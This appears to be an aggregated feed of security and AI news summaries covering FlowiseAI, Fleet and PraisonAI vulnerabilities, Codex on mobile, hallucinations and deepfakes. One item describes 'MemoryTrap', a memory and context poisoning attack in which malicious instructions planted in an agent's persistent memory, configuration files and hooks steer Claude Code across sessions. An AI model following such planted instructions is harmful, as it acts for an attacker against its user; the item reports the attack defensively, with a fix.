All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
FlowiseAI has a mass assignment vulnerability (a security flaw where an attacker can modify fields they shouldn't be able to change) in its tool update endpoint that allows authenticated users to reassign tools to different workspaces by manipulating the workspaceId field in their requests. The server fails to validate which properties users can modify, allowing attackers to change server-controlled fields like workspaceId, createdDate, and updatedDate, which breaks tenant isolation (the security boundary that keeps different users' data separate) in multi-workspace environments.
FlowiseAI has a mass assignment vulnerability (a flaw where an application accepts unintended user input to modify server-controlled data) in its variable update endpoint that lets authenticated users change internal fields like workspaceId, createdDate, and updatedDate. Because the server doesn't properly validate or check permissions, attackers can reassign variables to different workspaces, potentially breaking tenant isolation (the separation that keeps different organizations' data separate in shared systems).
Fleet has a vulnerability in how it handles software packages (.pkg, .deb, .rpm, .exe, .msi files) during uninstall. When a malicious package is uploaded, its metadata (information about the package) is not properly cleaned before being used to create uninstall scripts, allowing an attacker to run arbitrary commands (any code they want) with high privileges (root on macOS/Linux, SYSTEM on Windows) when the uninstall is triggered.
Fleet, a device management system, had a security flaw in its Windows MDM (mobile device management, a system for controlling and configuring devices) endpoint where requests without proper client certificates (digital credentials proving a device's identity) were incorrectly accepted as trusted. An attacker who knew a valid device's identifier could impersonate that device and receive sensitive configuration data like Wi-Fi passwords or VPN settings intended for the real device.
Agentic AI (systems that can independently plan and take actions to complete tasks) offers significant potential for financial services, but its success depends primarily on the quality, security, and accessibility of its underlying data rather than the sophistication of the AI itself. Financial services companies must establish centralized, well-indexed, and secure data stores that can be searched and managed at scale, while ensuring all data processes are auditable and explainable to meet regulatory requirements and avoid errors like hallucinations (false or made-up information from the AI).
Codex, an AI coding assistant, is now available in the ChatGPT mobile app, allowing users to manage and guide AI-assisted coding work from their phones while Codex runs on their laptops or remote machines. The mobile app lets users review outputs, approve commands, answer questions, and provide direction to Codex in real time from anywhere, with a secure relay layer (an encrypted connection system) protecting machines from direct internet exposure while syncing updates between devices.
PraisonAI, an open-source framework for building multi-agent AI systems, has a critical authentication bypass vulnerability (CVE-2026-44338, a severity rating of 7.3 out of 10) where its default API server ships with authentication disabled, allowing anyone to access protected endpoints and trigger workflows without permission. Threat actors began exploiting this vulnerability within hours of its public disclosure, scanning internet-exposed instances to confirm they could access the vulnerable endpoints.
PraisonAI, an open-source AI orchestration framework (software that coordinates multiple AI components), had a critical flaw where authentication (verification of user identity) was disabled by default in its API server, allowing anyone on the internet to access AI workflows without permission. Attackers began scanning for vulnerable systems within less than four hours of the vulnerability being publicly disclosed, prompting urgent calls for affected organizations to update immediately.
Elon Musk and Sam Altman, former cofounders of OpenAI, are in a legal dispute over whether Altman and another executive deceived Musk about converting the organization from non-profit to for-profit structure. The article argues that focusing on this personal conflict distracts from deeper problems with AI itself.
PraisonAI, a framework for deploying autonomous AI agents, had a critical authentication bypass vulnerability (CVE-2026-44338) in versions 2.5.6 to 4.6.33 where a legacy Flask API server shipped with authentication disabled by default, allowing unauthenticated attackers to access agent configurations and trigger workflows. Hackers began scanning for and testing this vulnerability within less than four hours of its public disclosure, demonstrating how quickly AI tools are enabling rapid exploitation of newly disclosed security flaws.
Fix: The source mentions two workarounds but no explicit fix or patch version: (1) avoid uploading software packages from untrusted or unverified sources, and (2) manually inspect and edit auto-generated uninstall scripts before deployment. An immediate upgrade is referenced as an option, but no specific patched version number is provided in this text.
GitHub Advisory DatabaseFix: If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.
GitHub Advisory DatabaseCompanies are shifting away from relying on third-party AI providers because they worry about losing control of their proprietary data and competitive advantage when that data passes through external systems. This movement toward AI and data sovereignty, meaning companies want to build and control their own AI models rather than depend on centralized cloud providers, is now a major business priority, with 70% of executives surveyed believing they need sovereign data and AI platforms to succeed.
AI chatbots like Gemini are exposing people's private phone numbers by revealing personally identifiable information (personal details like names and contact info) that was present in their training data, making private contact information much easier for the public to find. Victims have little ability to stop these privacy breaches once their information is already in the AI system.
This research paper presents MPV, a method for restricting access to master keys in multi-user Paillier systems (a cryptographic system that allows certain calculations on encrypted data without decrypting it first) by using mixed ciphertexts (encrypted data created with different encryption methods combined). The approach aims to improve security by preventing unauthorized parties from decrypting sensitive information even if they gain access to the master key.
Fix: The vulnerability has been patched in version 4.6.34. Additionally, users are advised to apply the latest fixes as soon as possible, audit existing deployments, review model provider billing for suspicious activity, and rotate credentials referenced in 'agents.yaml.'
The Hacker NewsFix: Sysdig urged organizations to immediately upgrade to PraisonAI version 4.6.34 or later, which removes the vulnerable legacy API behavior and introduces stronger authentication protections. The researchers also recommended discontinuing use of the legacy "api_server.py" entrypoint entirely. Until an upgrade is possible, defenders were advised to monitor network traffic for requests containing the "CVE-Detector/1.0" user-agent string and suspicious requests targeting /agents, /chat, /api/agents, and related endpoints.
CSO OnlineAI hallucinations are confident but factually incorrect outputs that pose serious security risks, especially in cybersecurity where they can drive automated decisions. Since AI models generate responses based on statistical patterns rather than verified facts, they may cite nonexistent sources or fabricate data while sounding authoritative, potentially leading to missed threats, false alarms, or flawed security decisions. A 2025 benchmark found that most AI models tested were more likely to give a confident wrong answer than a correct one on difficult questions.
Modern AI systems like Anthropic's Claude Mythos Preview are becoming very good at finding software vulnerabilities (weaknesses in code that attackers can exploit), which creates both serious risks and benefits. Attackers could use these AI systems to automatically discover and exploit vulnerabilities in critical systems worldwide, but defenders can use the same technology to find and patch those vulnerabilities before attackers do, ultimately making software more secure long-term.
Fix: The vulnerability was resolved in PraisonAI version 4.6.34. Organizations should update their deployments as soon as possible.
SecurityWeekDeepfake pornography increasingly uses adult content creators' bodies without consent, either by placing other people's faces onto their bodies or by using their work as training data for AI-generated nude images (synthetic sexual imagery created by artificial intelligence). This practice threatens creators' livelihoods, mental health, and safety, as their digital doubles may perform sex acts they never agreed to or be used in scams, while society largely ignores the harm to the bodies being exploited.
AI agents (software systems that can plan and take actions over time) that retain memory between sessions create a security risk called Memory & Context Poisoning, where attackers can inject malicious instructions into persistent storage that the agent continues to trust and follow in future interactions. Researchers found a vulnerability called MemoryTrap in Claude Code where a developer could unknowingly approve a malicious dependency that would persist in the agent's memory and configuration files, poisoning the agent's behavior across multiple projects and sessions. The core problem is that agents treat stored memory, configuration files, and hooks as trustworthy guidance without validating whether they contain attacker-controlled content.
Fix: Anthropic released Claude Code v2.1.50, which removed user memories from the system prompt (the core instructions that guide the AI's behavior) to reduce the specific attack path that MemoryTrap exploited.
OWASP GenAI SecurityThis academic publication discusses PUF (physically unclonable functions, unique fingerprints built into hardware chips that are nearly impossible to copy) optimization methods for authenticating IoT devices (internet-connected devices like smart home sensors). The research focuses on improving how these hardware-based security features can be used to verify that IoT devices are genuine and trustworthy.
This academic paper presents a method using AI to extract entities (named items like organizations or IP addresses) and relationships between them from threat intelligence data about APT (advanced persistent threat, a type of sophisticated cyberattack) attacks. The researchers developed a system to help security analysts automatically identify and organize complex attack patterns from unstructured text documents.
This research paper presents a method for optimally placing honeypots (decoy systems designed to attract and monitor attackers) in networks where multiple attackers operate simultaneously, using Bayesian Stackelberg Games (a mathematical framework for strategic decision-making under incomplete information). The approach aims to help defenders allocate honeypots more effectively by predicting attacker behavior and making strategic placement decisions.